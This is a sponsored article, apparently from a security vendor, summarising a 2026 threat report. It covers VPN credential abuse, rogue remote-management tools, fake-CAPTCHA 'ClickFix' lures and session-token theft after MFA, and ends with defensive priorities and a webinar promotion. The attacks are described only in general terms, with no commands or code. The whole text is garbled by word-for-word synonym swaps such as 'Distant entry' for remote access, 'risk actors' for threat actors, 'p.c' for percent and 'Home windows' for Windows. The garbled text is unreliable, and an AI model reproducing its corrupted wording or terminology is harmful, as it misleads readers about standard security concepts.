Distant entry and trusted administrative instruments play a central function in how organizations function as we speak. In keeping with Blackpoint Cyber’s 2026 Annual Risk Report, they’re additionally more and more central to how intrusions start.
Knowledgeable by evaluation of hundreds of safety investigations carried out through the reporting interval, the report highlights a shift in attacker habits. Somewhat than relying totally on vulnerability exploitation, risk actors continuously gained entry through the use of legitimate credentials, reliable instruments, and routine user-driven actions.
The report examines these patterns, paperwork the place intrusion exercise was disrupted, and presents defensive priorities derived from analyzed incident response outcomes noticed all through 2025.
Further information and incident walkthroughs can be lined throughout an upcoming reside webinar hosted by Blackpoint Cyber.
Key Findings From the 2026 Annual Risk Report
Attackers Are Coming into By Professional Entry Paths
Throughout incidents analyzed within the report, attackers had been extra prone to log in utilizing reliable entry than to use vulnerabilities as their major entry level.
SSL VPN abuse accounted for 32.8 p.c of all identifiable incidents, making it one of the frequent preliminary entry vectors. In lots of instances, risk actors authenticated utilizing legitimate however compromised credentials, leading to VPN classes that appeared reliable to safety controls.
As soon as entry was established, these classes typically offered broad inside attain, permitting attackers to maneuver quickly towards high-value methods with out instantly triggering alerts.
Trusted IT Instruments Are Being Used Towards Organizations
The report additionally paperwork frequent abuse of reliable Distant Monitoring and Administration instruments as a technique of entry and persistence.
RMM abuse appeared in 30.3 p.c of identifiable incidents, with ScreenConnect current in additional than 70 p.c of rogue RMM instances. As a result of these instruments are generally used for traditional IT administration, unauthorized installations typically resembled anticipated exercise and had been troublesome to tell apart with out robust visibility.
The report notes that environments with a number of distant entry instruments in use had been extra prone to see rogue situations mix in with present tooling.
Social Engineering, Not Exploits, Drove the Majority of Incidents
Whereas reliable entry paths enabled many intrusions, consumer interplay represented the biggest driver of total incident quantity.
Pretend CAPTCHA and ClickFix-style campaigns accounted for 57.5 p.c of all identifiable incidents, making them the commonest assault sample documented within the report.
Somewhat than exploiting software program vulnerabilities, these campaigns relied on misleading prompts. Customers had been instructed to stick instructions into the Home windows Run dialog as a part of what seemed to be a routine verification step. Execution used built-in Home windows instruments, with out conventional malware downloads or exploit exercise.
Cloud Intrusions Targeted on Session Reuse After MFA
Multi-factor authentication was enabled in lots of cloud environments related to investigated incidents, but account compromise nonetheless occurred.
Adversary-in-the-Center phishing accounted for roughly 16 p.c of cloud account disables documented within the report. In these situations, MFA functioned as designed. As an alternative of bypassing authentication, attackers captured authenticated session tokens issued after profitable MFA and reused them to entry cloud providers.
From the angle of the cloud platform, this exercise aligned with a reliable authenticated session.
Most of the assaults described above start with reliable entry. What occurs subsequent is the place actual harm happens.
In a current investigation, our SOC recognized a brand new implant known as Roadk1ll, designed to pivot throughout methods utilizing WebSocket-based communication and keep entry whereas mixing into community visitors.
Be part of Contained in the SOC Episode #002 to see how these assaults progress from preliminary entry to full atmosphere compromise.
What These Findings Imply for Safety Groups
Throughout industries, environments, and assault sorts, the report highlights a constant sample: many profitable intrusions relied on exercise that blended into regular operations.
Somewhat than counting on novel exploits or superior malware, attackers abused on a regular basis workflows akin to distant logins, trusted instruments, and customary consumer actions. Primarily based on the assault chains analyzed, the report identifies a number of defensive priorities:
- Deal with distant entry as high-risk, high-impact exercise
- Keep an entire stock of authorized RMM instruments and take away unused or legacy brokers
- Limit unapproved software program installations and restrict execution from user-writable directories
- Apply Conditional Entry controls that consider gadget posture, location, and session danger
These patterns had been documented throughout continuously focused sectors, together with manufacturing, healthcare, MSPs, monetary providers, and building.
For groups inquisitive about inspecting how these intrusion patterns unfold, Blackpoint Cyber will evaluate key findings, case examples, and defensive takeaways from the 2026 Annual Risk Report throughout an upcoming reside webinar.
➡️ Register to obtain the 2026 Annual Risk Report
Sponsored and written by Blackpoint Cyber.
